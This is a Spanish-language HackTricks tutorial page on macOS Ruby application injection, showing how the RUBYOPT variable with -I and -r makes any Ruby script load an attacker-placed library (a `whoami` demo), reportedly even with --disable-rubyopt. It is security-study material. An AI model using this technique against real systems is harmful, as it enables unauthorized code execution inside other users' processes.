mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-03 09:59:40 +00:00
3.2 KiB
3.2 KiB
Inyección en Aplicaciones Ruby de macOS
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sigue a Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github de HackTricks y HackTricks Cloud.
RUBYOPT
Usando esta variable de entorno es posible añadir nuevos parámetros a ruby cada vez que se ejecuta. Aunque el parámetro -e no se puede usar para especificar código ruby a ejecutar, es posible usar los parámetros -I y -r para añadir una nueva carpeta al camino de carga de las bibliotecas y luego especificar una biblioteca para cargar.
Crea la biblioteca inject.rb en /tmp:
{% code title="inject.rb" %}
puts `whoami`
{% endcode %}
Crea en cualquier lugar un script de ruby como:
{% code title="hello.rb" %}
puts 'Hello, World!'
Luego, haz que un script de ruby arbitrario lo cargue con:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Dato curioso, funciona incluso con el parámetro --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF revisa los PLANES DE SUSCRIPCIÓN!
- Consigue el merchandising oficial de PEASS & HackTricks
- Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de github HackTricks y HackTricks Cloud.